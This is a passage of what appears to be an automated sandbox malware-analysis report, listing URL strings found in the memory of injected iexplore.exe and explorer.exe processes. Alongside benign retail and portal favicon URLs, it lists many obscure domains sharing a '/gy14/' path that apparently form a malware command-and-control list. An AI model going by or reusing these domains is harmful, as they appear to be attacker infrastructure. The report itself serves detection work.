          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.soso.com/YA
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.stadtliche-arbeit.info
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.stadtliche-arbeit.info/gy14/
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.stadtliche-arbeit.info/gy14/www.truedatalab.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.stadtliche-arbeit.infoReferer:
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.survivordental.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.survivordental.com/gy14/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.survivordental.com/gy14/www.zezfhys.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.survivordental.comReferer:
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.taobao.com/
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.target.com/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.target.com/favicon.icoXj
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.target.com/x
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tchibo.de/favicon.icoJj
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techn9nehollywoodundead.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techn9nehollywoodundead.com/gy14/
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techn9nehollywoodundead.com/gy14/www.aicashu.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techn9nehollywoodundead.comReferer:
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tesco.com/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tesco.com/J
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico5j
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.theanhedonia.com
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.theanhedonia.com/gy14/
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.theanhedonia.com/gy14/www.mavbam.com
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.theanhedonia.comReferer:
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thelectricandsolar.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thelectricandsolar.com/gy14/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thelectricandsolar.com/gy14/www.buflitr.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thelectricandsolar.comReferer:
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico;j
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.truedatalab.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.truedatalab.com/gy14/
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.truedatalab.com/gy14/www.mrbmed.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.truedatalab.comReferer:
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tryscriptify.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tryscriptify.com/gy14/
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tryscriptify.com/gy14/www.naples.beauty
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tryscriptify.comReferer:
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tulisanemas.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tulisanemas.com/gy14/
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tulisanemas.com/gy14/www.883831.com
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tulisanemas.com/gy14/www.venitro.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tulisanemas.comReferer:
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D3FC000.00000004.00000001.00020000.00000000.sdmp, msapplication.xml6.13.drString found in binary or memory: http://www.twitter.com/
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ufocafe.net
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ufocafe.net/gy14/
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ufocafe.net/gy14/www.venitro.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ufocafe.netReferer:
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.univision.com/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.v72999.com
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.v72999.com/gy14/
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.v72999.com/gy14/www.amiciperlacoda.com
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.v72999.comReferer:
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vendorato.online
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vendorato.online/gy14/
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vendorato.online/gy14/www.stadtliche-arbeit.info
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vendorato.online/gy14/www.tulisanemas.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vendorato.onlineReferer:
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.venitro.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.venitro.com/gy14/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venitro.com/gy14/www.biosif.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.venitro.com/gy14/www.mosaica.online
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.venitro.com/gy14/www.mtdiyx.xyz
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venitro.com/gy14/www.techn9nehollywoodundead.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.venitro.comReferer:
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.walmart.com/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D3FC000.00000004.00000001.00020000.00000000.sdmp, msapplication.xml7.13.drString found in binary or memory: http://www.wikipedia.com/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4F1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wikipedia.com/:T
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D3FC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4185614018.000001BA5FDD9000.00000004.00000020.00020000.00000000.sdmp, msapplication.xml8.13.drString found in binary or memory: http://www.youtube.com/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4F1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com//00
          Source: iexplore.exe, 0000000D.00000002.4187597827.000001BA61100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/p
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4F1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/ue:T
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.yzyz841.xyz
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.yzyz841.xyz/gy14/
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.yzyz841.xyz/gy14/www.123bu6.shop
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.yzyz841.xyzReferer:
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zezfhys.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zezfhys.com/gy14/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zezfhys.com/gy14/www.123bu6.shop
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zezfhys.comReferer:
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www3.fnac.com/
